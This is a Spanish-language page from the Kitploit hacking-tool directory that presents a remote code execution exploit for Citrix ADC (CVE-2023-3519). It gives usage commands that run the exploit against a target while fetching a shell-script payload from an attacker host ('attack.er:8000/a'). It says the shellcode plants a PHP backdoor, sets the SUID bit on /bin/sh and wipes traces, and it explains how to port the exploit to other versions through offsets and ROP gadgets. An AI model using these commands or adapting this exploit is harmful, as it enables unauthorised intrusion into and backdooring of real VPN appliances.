Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-3519 — Exploit de RCE para CVE-2023-3519 | Kitploit
Herramientas/GitHubGitHub/bishopfox/cve-2023-3519
Análisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubbishopfox/cve-2023-3519

CVE-2023-3519

Exploit de RCE para CVE-2023-3519

Ver Repositorio
228435hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Citrix ADC RCE CVE-2023-3519

Este exploit utiliza direcciones y shellcode para Citrix VPX 13.1-48.47. Para el artículo completo, haga clic aquí.

Uso

Se requiere NASM para compilar el shellcode.

root@kitploit:~
$ sudo apt install nasm

El shellcode incluido descargará y ejecutará un script de shell desde un servidor http(s) remoto. El script acepta 3 argumentos: el host objetivo, el puerto objetivo y la URL de un payload de script de shell. En este repositorio se incluye un payload de ejemplo que ejecuta id y uname -a antes de limpiar sus rastros.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

La URL debe ser lo suficientemente corta para caber en el búfer del shellcode, y recibirá una advertencia si es demasiado larga.

Artefactos del shellcode

El shellcode creará una puerta trasera PHP en /var/netscaler/logon/a.php y establecerá el bit SUID en /bin/sh. El payload incluido muestra un ejemplo de cómo limpiar automáticamente estos artefactos. También tenga en cuenta que el shellcode no cierra sus descriptores de archivo, por lo que la explotación repetida excesiva puede resultar en agotamiento de recursos.

Descargar herramienta
sh

Adaptación a otras versiones

Para objetivos Citrix basados en FreeBSD, solo necesita encontrar 3 valores: el desplazamiento del puntero de retorno guardado, un gadget ROP jmp rsp (o algo equivalente, como push rsp; ret;), y la dirección a la que saltar para evitar un fallo. Estos parámetros están codificados cerca de la parte superior de cve-2023-3519.py. Para ciertas versiones, también puede ser necesario encontrar un cuarto valor para arreglar el valor de RBP, ya que el compilador genera cargas relativas a RBP en lugar de usar instrucciones POP para restaurar registros guardados.